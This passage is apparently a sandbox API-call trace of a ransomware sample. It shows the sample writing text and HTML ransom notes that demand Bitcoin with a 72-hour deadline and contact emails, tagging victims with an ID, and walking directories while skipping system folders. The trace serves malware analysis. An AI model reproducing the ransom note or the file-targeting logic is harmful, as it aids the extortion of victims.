will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.580] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.583] CloseHandle (hObject=0x388) returned 1
	[0166.585] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.586] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.586] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0166.587] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.587] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.587] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.588] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.588] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0166.588] CloseHandle (hObject=0x388) returned 1
	[0166.589] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.589] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.589] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.589] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\HELP_DECRYPT_YOUR_FILES.HTML") returned 107
	[0166.589] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.590] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.590] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0166.593] CloseHandle (hObject=0x388) returned 1
	[0166.600] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.600] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.600] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.601] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0166.602] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.602] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0166.602] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.602] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.603] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0166.603] CloseHandle (hObject=0x388) returned 1
	[0166.603] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xe25ce006, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x7cd29ddf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0166.604] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*") returned 82
	[0166.604] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.604] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\*.*", cchLength=0x52 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*") returned 0x52
	[0166.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.604] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="windows") returned 0x0
	[0166.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="boot") returned 0x0
	[0166.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="system volume information") returned 0x0
	[0166.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.605] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="temp") returned 0x0
	[0166.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="program files") returned 0x0
	[0166.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="appdata") returned 0x0
	[0166.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.606] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="application data") returned 0x0
	[0166.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="winnt") returned 0x0
	[0166.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="tmp") returned 0x0
	[0166.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.607] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="cache") returned 0x0
	[0166.607] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="webcache") returned 0x0
	[0166.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="inetcache") returned 0x0
	[0166.608] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.608] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="nvidia") returned 0x0
	[0166.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.609] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="packages") returned 0x0
	[0166.609] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.610] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="cookies") returned 0x0
	[0166.610] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.611] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\*.*", lpSrch="programdata") returned 0x0
	[0166.611] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.611] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.611] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xe25ce006, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x7cd29ddf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.611] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.611] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd29ddf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cd29ddf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cd50041, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0166.611] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cd29ddf, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7cd29ddf, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7cd29ddf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0166.611] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x828cdbb9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64e40818, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1
	[0166.611] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x828cdbb9, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x64e40818, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0x0, dwReserved1=0x0, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 0
	[0166.612] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0166.612] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0166.612] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x828cdbb9, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xe25ce006, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xe25ce006, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{9AC08E99-230B-47e8-9721-4577B7F124EA}", cAlternateFileName="{9AC08~1")) returned 0
	[0166.613] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0166.613] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0166.613] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1
	[0166.613] lstrcmpW (lpString1="Crypto", lpString2="..") returned 1
	[0166.613] lstrcmpW (lpString1="Crypto", lpString2=".") returned 1
	[0166.614] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0166.614] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0166.614] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto"
	[0166.614] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto") returned="C:\\Users\\All Users\\Microsoft\\Crypto"
	[0166.614] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\"
	[0166.614] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\"
	[0166.614] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*"
	[0166.614] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0166.616] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*") returned 39
	[0166.616] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.617] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\*.*", cchLength=0x27 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\*.*") returned 0x27
	[0166.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="windows") returned 0x0
	[0166.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="boot") returned 0x0
	[0166.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.617] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="system volume information") returned 0x0
	[0166.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="temp") returned 0x0
	[0166.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="program files") returned 0x0
	[0166.618] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.618] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="appdata") returned 0x0
	[0166.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="application data") returned 0x0
	[0166.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.619] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="winnt") returned 0x0
	[0166.619] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="tmp") returned 0x0
	[0166.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="cache") returned 0x0
	[0166.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.620] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="webcache") returned 0x0
	[0166.620] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="inetcache") returned 0x0
	[0166.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="nvidia") returned 0x0
	[0166.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="packages") returned 0x0
	[0166.621] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.621] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="cookies") returned 0x0
	[0166.622] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.622] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\*.*", lpSrch="programdata") returned 0x0
	[0166.622] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.622] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DSS", cAlternateFileName="")) returned 1
	[0166.622] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Keys", cAlternateFileName="")) returned 1
	[0166.622] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCPKSP", cAlternateFileName="")) returned 1
